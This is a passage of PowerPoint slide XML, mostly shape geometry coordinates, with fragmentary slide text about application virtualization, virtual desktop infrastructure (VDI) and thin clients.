                </a:lnTo>
                <a:lnTo>
                  <a:pt x="561251" y="1831"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="608838" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5551170" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5598756" y="1831"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5645339" y="7235"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5690784" y="16077"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5734957" y="28221"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5777720" y="43532"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5818940" y="61875"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5858481" y="83114"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5896208" y="107114"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5931985" y="133740"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5965677" y="162857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5997150" y="194330"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6026267" y="228022"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6052893" y="263799"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6076893" y="301526"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6098132" y="341067"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6116475" y="382287"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6131786" y="425050"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6143930" y="469223"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6152772" y="514668"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6158176" y="561251"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6160008" y="608838"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6160008" y="3044190"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6158176" y="3091776"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6152772" y="3138359"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6143930" y="3183804"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6131786" y="3227977"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6116475" y="3270740"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6098132" y="3311960"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6076893" y="3351501"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6052893" y="3389228"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6026267" y="3425005"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5997150" y="3458697"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5965677" y="3490170"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5931985" y="3519287"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5896208" y="3545913"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5858481" y="3569913"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5818940" y="3591152"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5777720" y="3609495"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5734957" y="3624806"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5690784" y="3636950"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5645339" y="3645792"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5598756" y="3651196"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5551170" y="3653028"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="608838" y="3653028"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="561251" y="3651196"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="514668" y="3645792"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="469223" y="3636950"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="425050" y="3624806"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="382287" y="3609495"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="341067" y="3591152"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="301526" y="3569913"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="263799" y="3545913"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="228022" y="3519287"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="194330" y="3490170"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="162857" y="3458697"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="133740" y="3425005"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="107114" y="3389228"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="83114" y="3351501"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="61875" y="3311960"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="43532" y="3270740"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28221" y="3227977"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16077" y="3183804"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7235" y="3138359"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1831" y="3091776"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3044190"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="608838"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="39405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195561" y="4310913"/>
            <a:ext cx="5321935" cy="231965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7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loads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images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by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thin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clients.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37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allow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lo</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="20">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>w</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-570">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-10">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>power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cl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en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devices.</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" marR="895350" indent="-342900">
              <a:lnSpc>
                <a:spcPts val="3010"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="15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cent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alize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cont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ol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v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cl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ent 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desktops.</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" marR="5080" indent="-342900">
              <a:lnSpc>
                <a:spcPts val="3010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allows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almost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completely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hosted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infrastructur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797795" y="2970276"/>
            <a:ext cx="4411980" cy="984885"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4411980" h="984885">
                <a:moveTo>
                  <a:pt x="4247896" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="164083" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120444" y="5857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="81242" y="22389"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48037" y="48037"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22389" y="81242"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5857" y="120444"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="164084"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="820420"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5857" y="864059"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22389" y="903261"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48037" y="936466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="81242" y="962114"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120444" y="978646"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="164083" y="984503"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4247896" y="984503"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4291535" y="978646"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4330737" y="962114"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4363942" y="936466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4389590" y="903261"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4406122" y="864059"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4411980" y="820420"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4411980" y="164084"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4406122" y="120444"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4389590" y="81242"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4363942" y="48037"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4330737" y="22389"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4291535" y="5857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4247896" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="3940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0117073" y="3027155"/>
            <a:ext cx="3772535" cy="79184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75"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-60">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Virtua</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-3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55">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>eskto</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-6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Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Environme</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-3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endParaRPr sz="2200">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" marL="2540">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="375"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-60">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>(VDE)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87092" y="1941702"/>
            <a:ext cx="1266507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Virtual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Desktop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infrastructure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(VDI)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process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using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VM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as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provision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corporate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desktops.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5555" y="306451"/>
            <a:ext cx="456628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95">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Application</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-110">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="85">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Virtualization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03291" y="760476"/>
            <a:ext cx="6227064" cy="365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349366" y="4331208"/>
            <a:ext cx="5227320" cy="3535679"/>
            <a:chOff x="5349366" y="4331208"/>
            <a:chExt cx="5227320" cy="3535679"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="object 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5349366" y="4646961"/>
              <a:ext cx="5227320" cy="3220085"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="5227320" h="3220084">
                  <a:moveTo>
                    <a:pt x="2612771" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2586926" y="7072"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2575179" y="28289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2575179" y="1861788"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2523868" y="1862205"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2472766" y="1863455"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2421874" y="1865540"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2371189" y="1868459"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2320714" y="1872212"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2270446" y="1876800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2220387" y="1882221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2170536" y="1888478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2120894" y="1895569"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2071459" y="1903495"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2022232" y="1912255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1973213" y="1921851"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1924401" y="1932282"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1875797" y="1943548"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1827401" y="1955649"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1779212" y="1968586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1731230" y="1982358"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1683455" y="1996966"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1635887" y="2012410"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="671576" y="1108297"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="660203" y="1101224"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="646509" y="1098867"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="632839" y="1101224"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="621538" y="1108297"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="614465" y="1126886"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="612108" y="1144333"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="614465" y="1159446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="621538" y="1171035"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1560830" y="2037556"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1513774" y="2053382"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1467020" y="2069946"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1420576" y="2087243"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1374446" y="2105269"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1328638" y="2124017"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1283158" y="2143484"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1238013" y="2163664"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1193207" y="2184551"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1148749" y="2206141"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1104644" y="2228428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1060899" y="2251408"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1017520" y="2275075"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="974513" y="2299425"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="931885" y="2324452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="889642" y="2350151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="847790" y="2376516"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="806336" y="2403544"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="765287" y="2431228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="724648" y="2459565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="684426" y="2488547"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="644627" y="2518171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="605258" y="2548432"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="566325" y="2579324"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="527834" y="2610841"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="489791" y="2642980"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="452204" y="2675735"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="415078" y="2709101"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="378420" y="2743073"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="342237" y="2777645"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="306533" y="2812813"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="271317" y="2848571"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="236593" y="2884915"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="202369" y="2921839"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168652" y="2959338"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135446" y="2997407"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="102759" y="3036041"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70597" y="3075235"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="38966" y="3114984"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7874" y="3155283"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="3189747"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6052" y="3201128"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20320" y="3205448"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="31694" y="3217824"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="45402" y="3219592"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="59110" y="3214288"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70485" y="3205448"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100820" y="3165548"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="131711" y="3126217"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163150" y="3087457"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="195130" y="3049273"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227644" y="3011668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="260682" y="2974646"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="294239" y="2938209"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="328305" y="2902361"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="362874" y="2867107"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="397938" y="2832449"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="433488" y="2798390"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="469518" y="2764936"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="506021" y="2732087"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="542987" y="2699850"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="580409" y="2668226"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="618281" y="2637219"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="656594" y="2606834"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="695340" y="2577072"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="734512" y="2547938"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="774102" y="2519436"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="814103" y="2491569"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="854507" y="2464339"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="895306" y="2437752"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="936492" y="2411810"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="978059" y="2386516"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1019998" y="2361875"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1062301" y="2337889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1104962" y="2314563"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1147972" y="2291900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1191323" y="2269902"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1235008" y="2248575"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1279020" y="2227920"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1323351" y="2207943"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1367992" y="2188645"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1412937" y="2170031"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1458178" y="2152105"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1503707" y="2134869"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1549516" y="2118327"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1595598" y="2102483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1641945" y="2087340"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1688549" y="2072901"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1735404" y="2059171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1782500" y="2046153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1829831" y="2033849"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1877389" y="2022264"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1925166" y="2011401"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1973154" y="2001264"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2021347" y="1991856"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2069735" y="1983181"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2118312" y="1975241"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2167071" y="1968041"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2216002" y="1961584"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2265099" y="1955874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2314354" y="1950914"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2363759" y="1946707"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2413306" y="1943257"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2462989" y="1940568"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2512799" y="1938643"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2562729" y="1937485"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2612771" y="1937099"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2663420" y="1937485"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2713917" y="1938643"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2764256" y="1940568"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2814429" y="1943257"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2864431" y="1946707"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2914255" y="1950914"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2963896" y="1955874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3013346" y="1961584"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3062601" y="1968041"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3111652" y="1975241"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3160495" y="1983181"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3209123" y="1991856"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3257529" y="2001264"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3305708" y="2011401"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3353653" y="2022264"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3401357" y="2033849"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3448816" y="2046153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3496021" y="2059171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3542968" y="2072901"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3589650" y="2087340"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3636060" y="2102483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3682192" y="2118327"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3728041" y="2134869"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3773599" y="2152105"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3818861" y="2170031"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3863820" y="2188645"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3908470" y="2207943"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3952805" y="2227920"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3996819" y="2248575"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4040504" y="2269902"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4083856" y="2291900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4126868" y="2314563"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4169532" y="2337889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4211845" y="2361875"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4253798" y="2386516"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4295385" y="2411810"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4336602" y="2437752"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4377440" y="2464339"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4417894" y="2491569"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4457958" y="2519436"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4497626" y="2547938"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4536890" y="2577072"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4575746" y="2606834"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4614186" y="2637219"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4652204" y="2668226"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4689795" y="2699850"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4726951" y="2732087"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4763667" y="2764936"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4799936" y="2798390"/>
